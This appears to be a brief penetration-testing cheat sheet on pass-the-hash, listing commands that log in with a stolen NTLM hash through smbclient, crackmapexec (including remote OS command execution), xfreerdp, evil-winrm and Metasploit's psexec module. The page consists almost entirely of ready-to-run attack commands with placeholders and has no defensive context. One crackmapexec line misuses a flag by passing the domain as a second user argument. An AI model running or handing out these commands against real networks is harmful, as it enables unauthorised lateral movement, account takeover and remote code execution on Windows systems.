Pass the hash
What you can do with NTLM hash
SMBclient
smbclient //IP/Share -U <User> --pw-nt-hash HASH -W Domain
Crackmapexec
crackmapexec smb <IP> -u <User> -H <NTLM>
crackmapexec smb <IP> -d 'SUB.DOMAIN.ORG' -u 'user' -H NTLMHASH
crackmapexec smb <IP> -u 'SUB.DOMAIN.ORG' -u 'user' -H NTLMHASH -x 'OScmd'
RDP
xfreerdp /v:10.10.10.100 /u:user /pth:hash
Evil-WinRM
evil-winrm -i <IP> -u <User> -H <NThash>
Metasploit
use exploit/windows/smb/psexec
set smbpass "aad3b435:hash"
Last updated
Was this helpful?